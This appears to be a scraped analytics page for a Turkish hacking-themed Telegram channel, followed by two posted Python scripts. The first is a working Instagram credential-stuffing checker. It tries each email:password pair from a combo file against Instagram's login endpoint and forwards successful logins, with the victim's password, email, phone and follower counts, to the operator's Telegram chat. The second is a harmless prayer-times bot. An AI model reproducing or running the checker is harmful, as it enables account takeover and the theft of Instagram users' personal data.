𝐕𝐎𝐈̇𝐃 𝐇𝐀𝐂𝐊
📈 Analytical overview of Telegram channel 𝐕𝐎𝐈̇𝐃 𝐇𝐀𝐂𝐊
Channel 𝐕𝐎𝐈̇𝐃 𝐇𝐀𝐂𝐊 (@voidhack0) in the Turkish language segment is an active participant. Currently, the community unites 10 398 subscribers, ranking 10 443 in the Technologies & Applications category and 2 973 in the Turkey region.
📊 Audience metrics and dynamics
Since its creation on невідомо, the project has demonstrated rapid growth, gathering an audience of 10 398 subscribers.
According to the latest data from 17 January, 2026, the channel demonstrates stable activity. Although there has been a change in the number of participants by -318 over the last 30 days and by 0 over the last 24 hours, overall reach remains high.
- Verification status: Not verified
- Engagement rate (ER): The average audience engagement rate is 2.47%. Within the first 24 hours after publication, content typically collects 1.41% reactions from the total number of subscribers.
- Post reach: On average, each post receives 257 views. Within the first day, a publication typically gains 147 views.
- Reactions and interaction: The audience actively supports content: the average number of reactions per post is 2.
- Thematic interests: Content is focused on key topics such as paneli̇, sorgu, çözüm, ki̇şi, çalma.
📝 Description and content policy
The author describes the resource as a platform for expressing subjective opinions:
“SQL Ve Web İşlemleri”
Thanks to the high frequency of updates (latest data received on 18 March, 2026), the channel maintains relevance and a high level of publication reach. Analytics show that the audience actively interacts with content, making it an important point of influence in the Technologies & Applications category.
import telebot
import requests
import time
from datetime import datetime
from termcolor import colored
TOKEN = input("Token Girin: ")
CHAT_ID = input("İD Girin: ")
DOSYA_YOLU = input("Dosya Yolu: ")
bot = telebot.TeleBot(TOKEN)
insta_url = "https://www.instagram.com/accounts/login/ajax/"
headers = {
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.102 Safari/537.36",
"X-CSRFToken": "P7aFeKEDReGOwp7EpouQ1G1XpRxz7NyC",
"X-Requested-With": "XMLHttpRequest"
}
def check_hesap(email, password):
unix_time = int(time.time())
data = {
"username": email,
"enc_password": f"#PWD_INSTAGRAM_BROWSER:0:{unix_time}:{password}"
}
with requests.Session() as session:
try:
response = session.post(insta_url, data=data, headers=headers)
if response.status_code == 200 and response.json().get("authenticated"):
hit_message = capture_info(session, email, password)
bot.send_message(CHAT_ID, hit_message, parse_mode="Markdown")
print(colored(f"[✔] Başarılı: {email} | {password}", "green"))
else:
print(colored(f"[✘] Başarısız: {email} | {password}", "red"))
except Exception as e:
print(colored(f"[!] Hata: {e}", "yellow"))
def capture_info(session, username, password):
profile_url = f"https://www.instagram.com/{username}/?__a=1"
response = session.get(profile_url, headers=headers)
now = datetime.now().strftime("%Y-%m-%d %H:%M:%S")
if response.status_code == 200:
try:
data = response.json()
followers = data["graphql"]["user"]["edge_followed_by"]["count"]
following = data["graphql"]["user"]["edge_follow"]["count"]
email = data["graphql"]["user"].get("business_email", "Bulunamadı")
phone = data["graphql"]["user"].get("business_phone_number", "Bulunamadı")
hit_message = (
f"🎯 **HIT TESPİT EDİLDİ!**\n"
f"📅 **Tarih:** `{now}`\n"
f"👤 **Kullanıcı:** `{username}`\n"
f"🔑 **Şifre:** `{password}`\n"
f"📧 **E-posta:** `{email}`\n"
f"📞 **Telefon:** `{phone}`\n"
f"👥 **Takipçi:** `{followers}`\n"
f"➡ **Takip Edilen:** `{following}`\n"
f"🌐 **Profil:** [Instagram](https://www.instagram.com/{username}/)"
)
return hit_message
except:
return f"🎯 **HIT TESPİT EDİLDİ!**\n📅 **Tarih:** `{now}`\n👤 **Kullanıcı:** `{username}`\n🔑 **Şifre:** `{password}`\n(Detaylar çekilemedi)"
return f"🎯 **HIT TESPİT EDİLDİ!**\n📅 **Tarih:** `{now}`\n👤 **Kullanıcı:** `{username}`\n🔑 **Şifre:** `{password}`\n(Profil bilgisi alınamadı)"
def kontrol_et():
with open(DOSYA_YOLU, "r", encoding="utf-8") as file:
for line in file:
try:
email, password = line.strip().split(":")
check_hesap(email, password)
except:
print(colored("[!] Format Hatası!", "yellow"))
if __name__ == "__main__":
kontrol_et()
TOKEN
İD
DOSYA YOLU
MAİL:PASS HALİNDE OLAN DOSYANIZI ATIN VE GERİNİ TOOLA BIRAKIN
CR : @SahalOrjimport telebot
import requests
TOKEN = "token gir"
bot = telebot.TeleBot(TOKEN)
API_LIST = [
"https://namaz-vakti.vercel.app/api/timesFromPlace?country=Turkey&city=",
"https://api.aladhan.com/v1/timingsByCity?country=Turkey&city=",
"https://ezanvakti.herokuapp.com/vakitler?ilce="
]
VAKIT_ADLARI = {
"sabah": ["Fajr", "Fajr", "Imsak"],
"ogle": ["Dhuhr", "Dhuhr", "Ogle"],
"ikindi": ["Asr", "Asr", "Ikindi"],
"aksam": ["Maghrib", "Maghrib", "Aksam"],
"yatsi": ["Isha", "Isha", "Yatsi"],
"sahur": ["Fajr", "Fajr", "Imsak"],
"iftar": ["Maghrib", "Maghrib", "Aksam"]
}
def sahal_get_vakit(sehir, vakit):
for i, api in enumerate(API_LIST):
try:
response = requests.get(f"{api}{sehir}")
if response.status_code == 200:
data = response.json()
if i == 0:
return f"🕌 {sehir.capitalize()} için {vakit.capitalize()} vakti: {data['times'][VAKIT_ADLARI[vakit][i]]}"
elif i == 1:
return f"🕌 {sehir.capitalize()} için {vakit.capitalize()} vakti: {data['data']['timings'][VAKIT_ADLARI[vakit][i]]}"
elif i == 2 and len(data) > 0:
return f"🕌 {sehir.capitalize()} için {vakit.capitalize()} vakti: {data[0][VAKIT_ADLARI[vakit][i]]}"
except:
continue
return "❌ Namaz vakitleri alınamadı, lütfen daha sonra tekrar deneyin."
@bot.message_handler(commands=["start"])
def sahal_send_welcome(message):
bot.reply_to(
message,
"Namaz Vakitleri Botu\n"
" Türkiye'deki namaz vakitlerini öğrenmek için aşağıdaki komutları kullanabilirsiniz:\n\n"
"Komutlar:\n"
" /sabah <şehir> - Sabah namazı vakti\n"
"/ogle <şehir> - Öğle namazı vakti\n"
" /ikindi <şehir> - İkindi namazı vakti\n"
" /aksam <şehir> - Akşam namazı vakti\n"
" /yatsi <şehir> - Yatsı namazı vakti\n"
" /sahur <şehir> - Sahur (imsak) vakti\n"
" /iftar <şehir> - İftar vakti\n\n"
" Örnek Kullanım:\n"
" /sabah Antalya\n"
"/iftar İstanbul\n"
"/sahur Adana\n"
"Kaynak: 3 farklı API kullanıyor (Namaz Vakti, Aladhan, Diyanet)"
)
@bot.message_handler(commands=["sabah", "ogle", "ikindi", "aksam", "yatsi", "sahur", "iftar"])
def sahal_send_vakit(message): # Burada da 'sahal' kelimesini fonksiyon ismine ekledik
komut = message.text.split()
if len(komut) < 2:
bot.reply_to(message, "⚠️ Lütfen şehir adını da girin. Örn: `/sabah İstanbul`")
return
sehir = " ".join(komut[1:]).capitalize()
vakit_adi = komut[0][1:]
cevap = sahal_get_vakit(sehir, vakit_adi)
bot.reply_to(message, cevap)
print("✅ Namaz Vakitleri Botu Çalışıyor...")
bot.polling()
TOKEN GİRMENİZ YETERLİDİR HAYIRLI RAMAZANLAR BEYLER
3 FARKLI APİDEN DENER 2 SİNDE OLMASA 1 NDE MUTLAKA VARDIR
MENU THOMASA AİTDİR AMMA ALT YAPISI YOK SANALDA
Cr: @SahalOrj